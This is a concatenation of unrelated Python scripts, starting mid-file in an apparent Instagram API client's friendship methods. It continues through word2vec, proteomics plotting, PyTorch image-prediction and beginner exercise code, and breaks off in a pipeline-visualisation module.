"friendship_statuses": { "123456789": { "following": false, "incoming_request": true, "outgoing_request": false, "is_private": false } } } """ if isinstance(user_ids, str): user_ids = [user_ids] params = { '_uuid': self.uuid, '_csrftoken': self.csrftoken, 'user_ids': ','.join(user_ids) } res = self._call_api('friendships/show_many/', params=params, unsigned=True) return res def friendships_create(self, user_id): """ Follow a user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "friendship_status": { "incoming_request": false, "followed_by": false, "outgoing_request": false, "following": true, "blocking": false, "is_private": false } } """ endpoint = 'friendships/create/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_destroy(self, user_id, **kwargs): """ Unfollow a user :param user_id: User id :param kwargs: :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/destroy/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_block(self, user_id): """ Block a user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/block/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_unblock(self, user_id): """ Unblock a user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/unblock/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def block_friend_reel(self, user_id): """ Hide your stories from a specific user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": true, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/block_friend_reel/{user_id!s}/'.format(**{'user_id': user_id}) params = {'source': 'main_feed'} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def unblock_friend_reel(self, user_id): """ Unhide your stories from a specific user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/unblock_friend_reel/{user_id!s}/'.format(**{'user_id': user_id}) res = self._call_api(endpoint, params=self.authenticated_params) return res def set_reel_block_status(self, user_ids, block_status='block'): """ Unhide your stories from a specific user :param user_ids: list of user IDs :param block_status: One of 'block', 'unblock' :return: .. code-block:: javascript { "friendship_statuses": { "123456790": { "following": true, "is_private": false, "incoming_request": false, "outgoing_request": false, "is_blocking_reel": true, "is_muting_reel": false }, "123456791": { "following": true, "is_private": false, "incoming_request": false, "outgoing_request": false, "is_blocking_reel": true, "is_muting_reel": false } }, "status": "ok" } """ if block_status not in ['block', 'unblock']: raise ValueError('Invalid block_status: {0!s}'.format(block_status)) if not isinstance(user_ids, list): user_ids = [user_ids] params = {'source': 'settings'} user_block_statuses = {} for user_id in user_ids: user_block_statuses[str(user_id)] = block_status params['user_block_statuses'] = user_block_statuses params.update(self.authenticated_params) return self._call_api('friendships/set_reel_block_status/', params=params) def blocked_reels(self): """ Get list of users from whom you've hid your stories """ warnings.warn('This endpoint is experimental. Do not use.', ClientExperimentalWarning) res = self._call_api('friendships/blocked_reels/', params=self.authenticated_params) if self.auto_patch and res.get('users'): [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def enable_post_notifications(self, user_id): """ Turn on post notifications for specified user. :param user_id: :return: """ res = self._call_api( 'friendships/favorite/{user_id!s}/'.format(**{'user_id': user_id}), params=self.authenticated_params) return res def disable_post_notifications(self, user_id): """ Turn off post notifications for specified user. :param user_id: :return: """ res = self._call_api( 'friendships/unfavorite/{user_id!s}/'.format(**{'user_id': user_id}), params=self.authenticated_params) return res def ignore_user(self, user_id): """ Ignore a user's follow request. :param user_id: :return: """ params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api( 'friendships/ignore/{user_id!s}/'.format(**{'user_id': user_id}), params=params) return res def remove_follower(self, user_id): """ Remove a follower. :param user_id: :return: """ params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api( 'friendships/remove_follower/{user_id!s}/'.format(**{'user_id': user_id}), params=params) return res
import os import pandas as pd import nltk import gensim import scipy from gensim import corpora, models, similarities os.chdir("C:/Users/pudutta/Desktop"); df=pd.read_csv('battles.csv'); x=df['name'].values.tolist() y=df['location'].values.tolist() corpus= x+y tok_corp= [nltk.word_tokenize(sent.decode('utf-8')) for sent in corpus] model = gensim.models.Word2Vec(tok_corp, min_count=1, size = 32) model.save('testmodel') model = gensim.models.Word2Vec.load('test_model') model.most_similar('Golden') #model.most_similar([vector])
import os, re import pandas as pd import numpy as np import matplotlib.pyplot as plt import matplotlib import seaborn as sns # test upset plot for chaperones in each cluster from upsetplot import generate_counts, from_contents from upsetplot import plot from simple_venn import venn4 from matplotlib.colors import LinearSegmentedColormap from loguru import logger from GEN_Utils import FileHandling logger.info('Import OK') peptide_folder = f'results/lysate_denaturation/peptide_features/' protein_folder = f'results/lysate_denaturation/protein_features/' output_folder = f'results/lysate_denaturation/plot_features/' if not os.path.exists(output_folder): os.makedirs(output_folder) cluster_colors = { '1': 'darkorange', '2': 'firebrick', '3': 'rebeccapurple', '4': 'royalblue', '0': 'grey', 1: 'darkorange', 2: 'firebrick', 3: 'rebeccapurple', 4: 'royalblue', 0: 'grey', 'multiple': 'grey', 'clusters': 'black'} font = {'family' : 'normal', 'weight' : 'normal', 'size' : 14 } matplotlib.rc('font', **font) plt.rcParams['svg.fonttype'] = 'none' def generate_plot(df, x_col, y_col, group_col, xlabel, ylabel, title, yrange=False): for group, data in df.groupby(group_col): fig, ax = plt.subplots(figsize=(4, 3)) sns.violinplot(x=x_col, y=y_col, data=data, palette=cluster_colors) plt.setp(ax.collections, alpha=.3) sns.swarmplot(x=x_col, y=y_col, data=data, palette=cluster_colors) if yrange: plt.ylim(*yrange) plt.ylabel(ylabel) plt.xlabel(xlabel) plt.title(f'{group}_{title}') plt.savefig(f'{output_folder}{group}_{title}.png') plt.savefig(f'{output_folder}{group}_{title}.svg') plt.show() # Test better boxplot for plotting def better_boxplot(dataframe, col_to_plot, cluster_col='cluster', cluster_colors=None, order=None, normed=False, title=False, output_folder=output_folder): df = dataframe.copy() if normed: df[col_to_plot] = (df[col_to_plot] - df[col_to_plot].mean()) / df[col_to_plot].std() pop_mean = df[col_to_plot].mean() error_df = df.groupby(cluster_col).mean().reset_index() error_df['error'] = df.groupby(cluster_col).std().reset_index()[col_to_plot] if order: error_df = error_df.set_index([cluster_col]).loc[order] error_df['x_pos'] = np.arange(0, len(error_df)) fig, ax = plt.subplots(figsize=(4, 3)) sns.stripplot(x=df[cluster_col], y=df[col_to_plot], palette=cluster_colors, color=df[cluster_col], alpha=0.5, order=order) # sns.boxplot(x=cluster_col, y=col_to_plot, data=df.groupby(cluster_col).mean().reset_index(), palette=cluster_colors, color=df[cluster_col], linewidth=2, ax=ax, order=order) plt.errorbar(error_df['x_pos'], error_df[col_to_plot], yerr=error_df['error'], ecolor='black', elinewidth=2.0, capsize=10, barsabove=True, capthick=1.0, marker='_', linewidth=0, markersize=20, markeredgecolor='black') ax.axhline(pop_mean, linewidth=1, color='grey', linestyle='--') plt.xlabel(cluster_col) plt.ylabel(col_to_plot) if title: plt.title(title) plt.savefig(f'{output_folder}{title}{col_to_plot}.png') plt.savefig(f'{output_folder}{title}{col_to_plot}.svg') plt.show() def layered_distplot(dataframe, col_to_plot, cluster_col='cluster', cluster_colors=None, order=None, normed=False, title=False, output_folder=output_folder): data = dataframe.copy() if normed: data[col_to_plot] = (data[col_to_plot] - data[col_to_plot].mean()) / data[col_to_plot].std() fig, ax = plt.subplots(len(data[cluster_col].unique()), sharex=True) for i, (group, df) in enumerate(data.groupby(cluster_col)): sns.kdeplot(df[col_to_plot], ax=ax[i], color=cluster_colors[group], shade=True) ax[i].axvline(df[col_to_plot].mean(), color='grey', linestyle='--') ax[i].get_legend().remove() plt.xlabel(col_to_plot) plt.ylabel('Density') if title: plt.title(title) # plt.savefig(f'{output_folder}{col_to_plot}.png') plt.show() def generate_protein_heatmap(df, quant_cols, title, cmap='Greys', normed=False, output_folder=output_folder): dataframe = df.copy() if normed: dataframe[quant_cols] = (dataframe[quant_cols] - dataframe[quant_cols].mean()) / dataframe[quant_cols].std() for group, df in dataframe.groupby('group'): fig, ax = plt.subplots(figsize=(4, 3)) sns.heatmap(df.groupby('cluster_filter_type').mean()[quant_cols], cmap=cmap) plt.title(title) plt.savefig(f'{output_folder}{title}_{group}.png') plt.savefig(f'{output_folder}{title}_{group}.svg') plt.show() def generate_heatmap(df, quant_cols, title, cluster_col='cluster', cmap='Greys', center=None, vmin=None, vmax=None, normed=False, output_folder=output_folder): dataframe = df.copy() if normed: dataframe[quant_cols] = (dataframe[quant_cols] - dataframe[quant_cols].mean()) / dataframe[quant_cols].std() fig, ax = plt.subplots(figsize=(4, 3)) sns.heatmap(dataframe.groupby(cluster_col).mean()[quant_cols], cmap=cmap, center=center, vmin=vmin, vmax=vmax) plt.title(title) plt.savefig(f'{output_folder}{title}.png') plt.savefig(f'{output_folder}{title}.svg') plt.show() # ---------------predicted peptide features--------------- if not os.path.exists(f'{output_folder}peptides/'): os.makedirs(f'{output_folder}peptides/') # read in features peptide_predicted = pd.read_excel(f'{peptide_folder}predicted_features_summary.xlsx', sheet_name='compiled_data') peptide_predicted.drop([col for col in peptide_predicted.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) # Map colours - in the case of peptides, using the 'mixed' col # as this relates to the specific peptides added to each cluster cols_to_plot = ['Polar', 'Neutral', 'Hydrophobic', 'Low', 'Medium', 'High', 'charge_positive', 'charge_neutral', 'charge_negative', 'Helix', 'Strand', 'Coil', 'Buried', 'Exposed', 'Intermediate', 'polar_sum', 'hydrophobic_sum'] for title, group_cols in {'Amino acid class': ['Polar', 'Neutral', 'Hydrophobic'], 'Hydrophobicity': ['Low', 'Medium', 'High'], 'Charge': ['charge_positive', 'charge_neutral', 'charge_negative'], 'Secondary structure': ['Helix', 'Strand', 'Coil'], 'Solvent exposure': ['Buried', 'Exposed', 'Intermediate']}.items(): # generate_heatmap(peptide_predicted, group_cols, title=title, cmap='Greys', normed=False, output_folder=output_folder) generate_heatmap(peptide_predicted, group_cols, title=f'Peptide {title}', cmap=sns.diverging_palette(180, 300, sep=80, n=7), center=0, vmin=-0.1, vmax=0.1, normed=True, output_folder=f'{output_folder}peptides/') # --------------------calculated peptide features-------------------- peptide_calculated = pd.read_excel(f'{peptide_folder}calculated_peptide_features_summary.xlsx', sheet_name=None) peptide_calculated.update({key: value.drop([col for col in value.copy().columns.tolist() if 'Unnamed: ' in str(col)], axis=1) for key, value in peptide_calculated.items()}) # Proportion of peptides in each cluster mapped to PDB residue mapped = peptide_calculated['mapped_chi_observed'].copy().drop('feature_legend', axis=1).T.reset_index().rename(columns={'index':'cluster'}) mapped['proportion'] = mapped[1] / mapped[0] * 100 fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=mapped['cluster'], y=mapped['proportion'], color=mapped['proportion'], palette=cluster_colors) plt.ylim(0, 100) plt.ylabel('Proportion of peptides with PDB structures') plt.xlabel('Cluster') plt.savefig(f'{output_folder}mapped_peptides.png') plt.savefig(f'{output_folder}mapped_peptides.svg') # secondary structure structure = peptide_calculated['dssp_structure_chi_observed'].copy().set_index('dssp_simple_structure') structure_proportions = structure.copy() / structure.sum() * 100 structure_proportions = pd.melt(structure_proportions.reset_index(), id_vars='dssp_simple_structure', value_vars=structure_proportions.columns, var_name='cluster', value_name='percent').fillna(0) # H = α-helix # B = residue in isolated β-bridge # E = extended strand, participates in β ladder # G = 3-helix (310 helix) # I = 5 helix (π-helix) # T = hydrogen bonded turn # S = bend # Define some colours colours = {'turn': '#46474a', 'strand': '#84868a', 'helix': '#5f6163', 'bend': '#a6a8ab', '-': '#232324'} structure_proportions['baseline'] = 0 baselines = dict(zip(structure_proportions['cluster'], structure_proportions['baseline'])) fig, ax = plt.subplots(figsize=(4, 3)) for x, (structure, df) in enumerate(structure_proportions.groupby('dssp_simple_structure')): logger.info(x) position = (len(structure_proportions['dssp_simple_structure'].unique()) - x) df['baseline'] = df['cluster'].map(baselines) df['percent'] = df['baseline'] + df['percent'] sns.barplot(x='cluster', y='percent', data=df, color=colours[structure], label=structure, zorder=position, ax=ax) baselines.update(dict(zip(df['cluster'], df['percent']))) ax.set_ylim(0, 100) handles, labels = ax.get_legend_handles_labels() ax.legend(handles[::-1], labels[::-1], title='Structure', bbox_to_anchor=(1.0, 1.0)) plt.xlabel('Cluster') plt.ylabel('Proportion of mapped structures') plt.savefig(f'{output_folder}cys_residues_simplestructure.png', dpi=500) plt.savefig(f'{output_folder}cys_residues_simplestructure.svg') plt.show() # asa calculated_asa = peptide_calculated['compiled_clustered'].copy() for col in ['pdb_asa', 'dssp_asa']: better_boxplot(calculated_asa, col, cluster_col='cluster', cluster_colors=cluster_colors, normed=False, title=f'Peptide _', output_folder=f'{output_folder}') layered_distplot(calculated_asa, col, cluster_col='cluster', cluster_colors=cluster_colors, normed=False, title=f'Peptide_', output_folder=f'{output_folder}') # site info - residue features residue_features = peptide_calculated['residue_features_chi_observed'].copy().set_index('feature_legend') residue_features_proportions = residue_features.copy() / residue_features.sum() * 100 residue_features_proportions = pd.melt(residue_features_proportions.reset_index(), id_vars='feature_legend', value_vars=residue_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) residue_features_proportions = residue_features_proportions[residue_features_proportions['feature_legend'] == 1] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=residue_features_proportions['cluster'], y=residue_features_proportions['percent'], color=residue_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of peptides\nwith residue feature') plt.xlabel('Type') plt.savefig(f'{output_folder}residue_features.png') plt.savefig(f'{output_folder}residue_features.svg') plt.show() # site info - domain features domain_features = peptide_calculated['domain_features_chi_observed'].copy().set_index('feature_legend') domain_features_proportions = domain_features.copy() / domain_features.sum() * 100 domain_features_proportions = pd.melt(domain_features_proportions.reset_index(), id_vars='feature_legend', value_vars=domain_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) domain_features_proportions = domain_features_proportions[domain_features_proportions['feature_legend'] == 2] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=domain_features_proportions['cluster'], y=domain_features_proportions['percent'], color=domain_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of peptides\nwith domain feature') plt.xlabel('Type') plt.savefig(f'{output_folder}domain_features.png') plt.savefig(f'{output_folder}domain_features.svg') plt.show() # site info - PFAM domains domain_features = peptide_calculated['pfam_chi_observed'].copy().set_index('feature_legend') domain_features_proportions = domain_features.copy() / domain_features.sum() * 100 domain_features_proportions = pd.melt(domain_features_proportions.reset_index(), id_vars='feature_legend', value_vars=domain_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) domain_features_proportions = domain_features_proportions[domain_features_proportions['feature_legend'] == 1] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=domain_features_proportions['cluster'], y=domain_features_proportions['percent'], color=domain_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of residues\nlocated in PFAM domain') plt.xlabel('Cluster') plt.savefig(f'{output_folder}pfam_domains.png') plt.savefig(f'{output_folder}pfam_domains.svg') plt.show() # ---------------predicted protein features--------------- if not os.path.exists(f'{output_folder}proteins/'): os.makedirs(f'{output_folder}proteins/') order=[1, 2, 3, 4, 'multiple'] # read in features protein_predicted = pd.read_excel(f'{protein_folder}predicted_features_anova.xlsx', sheet_name='compiled_data') protein_predicted.drop([col for col in protein_predicted.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) # Map colours - in the case of peptides, using the 'mixed' col # as this relates to the specific peptides added to each cluster cols_to_plot = ['Polar', 'Neutral', 'Hydrophobic', 'Low', 'Medium', 'High', 'charge_positive', 'charge_neutral', 'charge_negative', 'Helix', 'Strand', 'Coil', 'Buried', 'Exposed', 'Intermediate', 'polar_sum', 'hydrophobic_sum'] for title, group_cols in {'Amino acid class': ['Polar', 'Neutral', 'Hydrophobic'], 'Hydrophobicity': ['Low', 'Medium', 'High'], 'Charge': ['charge_positive', 'charge_neutral', 'charge_negative'], 'Secondary structure': ['Helix', 'Strand', 'Coil'], 'Solvent exposure': ['Buried', 'Exposed', 'Intermediate']}.items(): # generate_heatmap(protein_predicted, group_cols, title=title, cmap='Greys', normed=False, output_folder=output_folder) generate_heatmap(protein_predicted, group_cols, cluster_col='unique', title=f'Protein {title}', cmap=sns.diverging_palette(180, 300, sep=80, n=7), center=0, vmin=-0.3, vmax=0.3, normed=True, output_folder=f'{output_folder}proteins/') protein_disorder = pd.read_excel(f'{protein_folder}disorder_prediction_kruskal.xlsx', sheet_name='compiled_data') protein_disorder.drop([col for col in protein_disorder.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) protein_disorder['unique'] = protein_disorder['unique'] better_boxplot(protein_disorder[protein_disorder['disordered'] == 1], 'proportion', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'protein_disorder') layered_distplot(protein_disorder[protein_disorder['disordered'] == 1], 'proportion', cluster_col='unique', cluster_colors=cluster_colors, normed=False, title=f'protein_disorder') # --------------------protein features-------------------- order=[1, 2, 3, 4, 'multiple'] peptides = pd.read_excel(f'{protein_folder}calculated_protein_features_summary.xlsx', sheet_name=None) molweight = peptides['len_mw_summary'].copy() molweight['kda'] = molweight['MW'] / 1000 better_boxplot(molweight, 'kda', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'mol_weight', output_folder=output_folder) # Molecular weight fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.boxplot(x=molweight['unique'], y=molweight['kda'], color='white', order=order, fliersize=0) sns.swarmplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) plt.ylabel('Molecular weight (kDa)') plt.xlabel('Cluster') plt.savefig(f'{output_folder}MolWeight_unique.png') plt.savefig(f'{output_folder}MolWeight_unique.svg') plt.show() better_boxplot(molweight, 'length', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'length', output_folder=output_folder) # Length fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.boxplot(x=molweight['unique'], y=molweight['length'], color='white', order=order, fliersize=0) sns.swarmplot(x=molweight['unique'], y=molweight['length'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) plt.ylabel('Protein Length') plt.xlabel('Cluster') plt.savefig(f'{output_folder}protein_length_unique.png') plt.savefig(f'{output_folder}protein_length_unique.svg') plt.show() # PFAM domains fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.swarmplot(x=molweight['unique'], y=molweight['pfam_id'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) sns.boxplot(x=molweight['unique'], y=molweight['pfam_id'], color='white', order=order, fliersize=0) plt.ylabel('Number of PFAM domains') plt.xlabel('Cluster') plt.savefig(f'{output_folder}protein_pfam_unique.png') plt.savefig(f'{output_folder}protein_pfam_unique.svg') plt.show() # Protein venn diagram - Note cluster colours are slightly off here - need to add manually for now protein_venn = pd.read_excel(f'{protein_folder}protein_venn.xlsx') protein_venn.drop([col for col in protein_venn.columns.tolist() if 'Unnamed: ' in str(col)], axis=1, inplace=True) protein_venn['cluster'] = protein_venn['name'].str.split(' ').str[-1] labels = protein_venn['name'][0:np.max([len(x) for x in protein_venn['cluster']])] fig, ax = plt.subplots(figsize=(4, 3)) # venn4(protein_venn['count'], set_labels=labels, set_colors=[cluster_colors[cluster.split(' ')[-1]] for cluster in labels], ax=ax) venn4(protein_venn['count'], set_labels=labels, set_colors=['royalblue', 'rebeccapurple', 'darkorange', 'firebrick'], ax=ax) plt.savefig(f'{output_folder}protein_clustered_venn.png') plt.savefig(f'{output_folder}protein_clustered_venn.svg') plt.show() # Chaperone venn diagram - Note cluster colours are slightly off here - need to add manually for now chaperones = pd.read_excel(f'{protein_folder}chaperone_enrichment_summary.xlsx', sheet_name=None) chaperones.update({key: value.drop([col for col in value.columns.tolist() if 'Unnamed: ' in str(col)], axis=1) for key, value in chaperones.items()}) chaperone_counts = chaperones['overlap'] chaperone_counts['cluster'] = chaperone_counts['name'].str.split(' ').str[-1] labels = chaperone_counts['name'][0:np.max([len(x) for x in chaperone_counts['cluster']])] fig, ax = plt.subplots(figsize=(4, 3)) # venn4(chaperone_counts['count'], set_labels=labels, set_colors=[cluster_colors[cluster.split(' ')[-1]] for cluster in labels], ax=ax) venn4(chaperone_counts['count'], set_labels=labels, set_colors=['royalblue', 'rebeccapurple', 'darkorange', 'firebrick'], ax=ax) plt.savefig(f'{output_folder}chaperone_clustered_venn.png') plt.savefig(f'{output_folder}chaperone_clustered_venn.svg') plt.show() # Generate upset plot clustered_chaperones = chaperones['clustered_chaperones'].copy() clustered_chaperones = clustered_chaperones[clustered_chaperones['chaperone'] == 1] chaperone_membership = {str(cluster): df['Proteins'].unique().tolist() for cluster, df in clustered_chaperones.groupby('cluster')} counts = from_contents(chaperone_membership) plot(counts) plt.savefig(f'{output_folder}chaperone_upset.png') plt.savefig(f'{output_folder}chaperone_upset.svg') plt.show() # Generate heatmap representation chaperone_details = chaperones['chaperone_details'].copy()[['Proteins', 'mixed', 'Gene names']] chaperone_details['name'] = chaperone_details['Gene names'].str.split(' ').str[0].str.upper() chaperone_heatmap = counts.reset_index() chaperone_heatmap['cluster_num'] = chaperone_heatmap.sum(axis=1) for col in chaperone_heatmap.set_index(['id', 'cluster_num']).columns.tolist(): chaperone_heatmap[col] = [int(col) if val else np.nan for val in chaperone_heatmap[col]] chaperone_heatmap['name'] = chaperone_heatmap['id'].map(dict(chaperone_details[['Proteins', 'name']].values)) chaperone_heatmap.sort_values(['cluster_num', 'name'], inplace=True) cmap = LinearSegmentedColormap.from_list('clusters', ['darkorange', 'firebrick', 'rebeccapurple', 'royalblue'], 4) fig, ax = plt.subplots(figsize=(5, 20)) sns.heatmap(chaperone_heatmap.set_index('name')[['1', '2', '3', '4']], cmap=cmap) plt.xlabel('Cluster') plt.savefig(f'{output_folder}chaperone_heatmap.png') plt.savefig(f'{output_folder}chaperone_heatmap.svg') # Visualise count of chaperones represented in each cluster chaperone_proportions = chaperones['chaperones_chi_obs'].copy().set_index('chaperone').T.reset_index().rename(columns={'index': 'unique'}) chaperone_proportions['names'] = [sorted(clustered_chaperones[clustered_chaperones['unique'] == cluster]['Proteins'].map(dict(chaperone_details[['Proteins', 'name']].values)).unique().tolist()) for cluster in chaperone_proportions['unique']] chaperone_proportions['percent'] = round(chaperone_proportions[1] / (chaperone_proportions[0]+chaperone_proportions[1]) * 100, 1) fig, ax = plt.subplots(figsize=(6, 5)) sns.barplot(x='unique', y=1, data=chaperone_proportions, order=[1, 2, 3, 4, 'multiple'], color='unique', palette=cluster_colors) # add annotations for proteins in each bar for x, cluster in enumerate([1, 2, 3, 4, 'multiple']): names = chaperone_proportions[chaperone_proportions['unique'] == cluster]['names'].tolist()[0] for y, name in enumerate(names): plt.annotate(name, (x-0.25, y+0.15), color='white', size=8) # add percent of total proteins for x, cluster in enumerate([1, 2, 3, 4, 'multiple']): percent = chaperone_proportions[chaperone_proportions['unique'] == cluster]['percent'].tolist()[0] max_val = chaperone_proportions[chaperone_proportions['unique'] == cluster][1].tolist()[0] plt.annotate(f'{percent}%', (x-0.2, max_val + 1), color='black', size=8) plt.ylim(-0.9, 20.1) plt.yticks(np.arange(0, 21, 2)) plt.ylabel('Number of chaperones') plt.xlabel('Cluster') plt.savefig(f'{output_folder}chaperone_count.png') plt.savefig(f'{output_folder}chaperone_count.svg')
import torch import numpy as np from torch import nn from torchvision import datasets, models, transforms from PIL import Image import argparse import json parser = argparse.ArgumentParser() parser.add_argument('image_dir', help = 'Provide path to image', type = str) parser.add_argument('load_dir', help = 'Provide path to checkpoint', type = str) parser.add_argument('--top_k', help = 'To get top K most likely classes, enter a number (K). ', type = int) parser.add_argument('--category_names', help = 'Provide JSON file name for mapping of categories to real names', type = str) parser.add_argument('--gpu', help = "To choose to train the model on GPU, type cuda", type = str) args = parser.parse_args() if args.category_names: with open(args.category_names, 'r') as f: cat_to_name = json.load(f) else: with open('cat_to_name.json', 'r') as f: cat_to_name = json.load(f) def load_model(file_path): checkpoint = torch.load(file_path) if checkpoint['arch'] == 'alexnet': model = models.alexnet(pretrained = True) else: model = models.densenet121(pretrained = True) for param in model.parameters(): param.requires_grad = False model.classifier = checkpoint['classifier'] model.load_state_dict(checkpoint['state_dict']) model.class_to_idx = checkpoint['class_to_idx'] return model def process_image(image): p_image = Image.open(image) transform = transforms.Compose([transforms.Resize(255), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) final_image = transform(p_image) return final_image def predict(image_path, model, top_k, device): final_image = process_image(image_path) if device == 'cuda': final_image = final_image.type(torch.cuda.FloatTensor) else: final_image = final_image final_image.unsqueeze_(0) model.to(device) final_image.to(device) model.eval() with torch.no_grad(): ps = torch.exp(model.forward(final_image)) top_probs, top_indices = ps.topk(top_k) top_probs = top_probs.cpu() top_indices = top_indices.cpu() top_probs = top_probs[0].numpy() idx_to_class = {} for key, value in model.class_to_idx.items(): idx_to_class[value] = key np_top_indices = top_indices[0].numpy() top_labels = [] for idx in np_top_indices: top_labels.append(int(idx_to_class[idx])) return top_probs, top_labels image_path = args.image_dir model = load_model(args.load_dir) if args.top_k: top_k = args.top_k else: top_k = 1 if args.gpu == 'cuda': device = 'cuda' else: device = 'cpu' top_probs, top_labels = predict(image_path, model, top_k, device) top_classes = [cat_to_name[str(lab)] for lab in top_labels] for k in range(top_k): print("Number: {}/{}.. ".format(k+1, top_k), "Class name: {}.. ".format(top_classes[k]), "Probability: {:.2f} % ".format(top_probs[k]*100) )
somaidade=0 mediaidade=0 idademulher=0 maioridadehomem=0 nomevelho='' for p in range(1,5): nome=str(input('digite o nome da {} pessoa: '.format(p))) idade=int(input('digite a idade da {} pessoa: '.format(p))) sexo=str(input('digite o sexo da {} pessoa: [M/F] '.format(p))) print('--------------------------------------') somaidade += idade if idade<20 and sexo=='F': idademulher += 1 if p==1 and sexo in 'Mm': maioridadehomem=idade nomevelho=nome if sexo in 'Mm' and maioridadehomem<idade: maioridadehomem=idade nomevelho=nome mediaidade=somaidade/4 print('a idade media é de {}'.format(mediaidade)) print('{} mulhere(s) tiveram idade abaixo de 20 anos'.format(idademulher)) print('o homem mais velho tem {} anos de idade e se chama {}'.format(maioridadehomem,nomevelho)) print('--------------------------------------')
import pkg_resources import string import numpy as np from dateutil.parser import parse import json import networkx as nx from ._graph_matching import pipeline_to_graph, merge_multiple_graphs from ._powerset_analysis import compute_group_importance from ._comm_api import setup_comm_api from collections import defaultdict import copy exportedPipelines = [] def comm_powerset_analysis(msg): pipelines = msg['pipelines'] scores = msg['scores'] analysis = compute_group_importance(pipelines, scores, 2) return {"analysis": analysis} setup_comm_api('powerset_analysis_comm_api', comm_powerset_analysis) def comm_merge_graphs(msg): pipelines = msg['pipelines'] graphs = [pipeline_to_graph(pipeline, pipeline['pipeline_digest']) for pipeline in pipelines] merged = merge_multiple_graphs(graphs) data_dict = nx.readwrite.json_graph.node_link_data(merged) return {"merged": data_dict} setup_comm_api('merge_graphs_comm_api', comm_merge_graphs) def comm_export_pipelines(msg): global exportedPipelines exportedPipelines = msg['pipelines'] return {} setup_comm_api('export_pipelines_comm_api', comm_export_pipelines) def get_exported_pipelines(): global exportedPipelines return exportedPipelines def id_generator(size=15): """Helper function to generate random div ids. This is useful for embedding HTML into ipython notebooks.""" chars = list(string.ascii_uppercase) return ''.join(np.random.choice(chars, size, replace=True)) def make_html(data_dict, id): lib_path = pkg_resources.resource_filename(__name__, "build/pipelineVis.js") bundle = open(lib_path, "r", encoding="utf8").read() html_all = """ <html> <head> </head> <body> <script> {bundle} </script> <div id="{id}"> </div> <script> pipelineVis.renderPipelineMatrixBundle("#{id}", {data_dict}); </script> </body> </html> """.format(bundle=bundle, id=id, data_dict=json.dumps(data_dict)) return html_all def extract_primitive_names(pipeline): return [s['primitive']['python_path'] for s in pipeline['steps']] def extract_module_matrix(pipelines): from sklearn import preprocessing import numpy as np le = preprocessing.LabelEncoder() all_primitives = set() for pipeline in pipelines: all_primitives = all_primitives.union(extract_primitive_names(pipeline)) le.fit(list(all_primitives)) data_matrix = np.zeros([len(pipelines), 